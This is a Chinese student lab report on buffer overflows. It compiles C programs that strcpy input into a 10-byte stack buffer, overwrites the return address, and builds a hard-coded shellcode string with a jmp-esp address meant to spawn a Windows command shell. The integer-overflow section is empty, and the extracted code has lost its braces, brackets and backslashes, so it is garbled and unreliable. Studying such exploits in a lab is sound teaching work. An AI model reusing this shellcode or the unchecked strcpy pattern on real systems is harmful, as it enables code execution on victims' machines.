安全程序设计实验报告.doc
实验报告课程名称:学院:姓名:班级:学号:年月日实验一:缓冲区溢出安全问题一:什么是缓冲区溢出:缓冲区溢出是指当计算机向缓冲区内填充数据时超过了缓冲区本身的容量而溢出;某些情况下,溢出的数据只是覆盖在一些不重要的的内存空间上,不会产生严重后果;但是一旦溢出的数据覆盖在合法数据上,可能会给系统带来巨大的危害。实验程序:运行调试缓冲区溢出P02_03.C,P02_04.C,P02_05.C,P02_06.C二:实验步骤:1:打开microsoftvisualstudio6.0选择microsoftvisualc+File-newprojectswin32consoleapplication(项目名称P0203)File-new-files-c+sourcefile编辑程序:#include<stdio.h>#include<string.h>voidfunction(char*input)charbuffer10;strcpy(buffer,input);printf("Callfun1,buffer=%sn",buffer);intmain(intargc,char*argv)function(argv1);return0;Buildcompilep0203.cpp-buildp02.exe查找到工程所在地址例如D:p02.exe2:开始-运行-cmd-输入D:(进入D盘)-输入CDP02Debug(进入生成exe所在文件)输入“P02security”会显示:输入“p02abcdefghijklmnopqrstuvwxyz1234567890”弹出应用程序错误警示框,提示为3:将代码修改为:#include<stdio.h>#include<string.h>voidfun1(char*input)charbuffer10;strcpy(buffer,input);printf("Callfun1,buffer=%sn",buffer);voidfun2()printf("callfun2");intmain(intargc,char*argv)printf("Addressoffun2=%pn",fun2);fun1(argv1);return0;输入“p02abcde”显示:输入“p02abcdefghijklmnopqrstuvwxyz1234567890”弹出应用程序错误警示框,提示为4:代码修改为:#include<stdio.h>#include<string.h>voidfun1(char*input)charbuffer10;strcpy(buffer,input);printf("Callfun1,buffer=%sn",buffer);voidfun2()printf("callfun2");intmain(intargc,char*argv)printf("Addressoffun2=%pn",fun2);fun1("abcdefghijklmnopqrstuvwxyz12x05x10x40");return0;直接调用程序,无法像书中所说可以调用fun2函数,因为找不到下一个buffer区的入口5:指令通用跳转地址为0x7ffa4512#include<stdio.h>#include<string.h>voidfun1(char*input)charbuffer10;strcpy(buffer,input);printf("Callfun1,buffer=%sn",buffer);intmain(intargc,char*argv)charbuffer="abcdefghijklmnopqrstuvwxzy12x12x45xfax7f""x55x8BxECx33xC0x50x50xC6x45xF4x4DxC6x45xF5x53""xC6x45xF6x56xC6x45xF7x43xC6x45xF8x52xC6x45xF9x54xC6x45xFAx2ExC6""x45xFBx44xC6x45xFCx4CxC6x45xFDx4CxBA""x77x1dx80x7c""x52x8Dx45xF4x50xFFx55xF0""x55x8BxECx83xECx2CxB8x63x6Fx6Dx6Dx89x45xF4xB8x61x6Ex64x2E""x89x45xF8xB8x63x6Fx6Dx22x89x45xFCx33xD2x88x55xFFx8Dx45xF4""x50xB8""xc7x93xbfx77""xFFxD0""x83xC4x12x5D";fun1(buffer);return0;运行程序,并不能像书中所说调出一个控制台命令窗口,因为实验室所装操作系统的缘故。理论上应该能行的通。实验二:整数溢出问题1:2:3:4:5: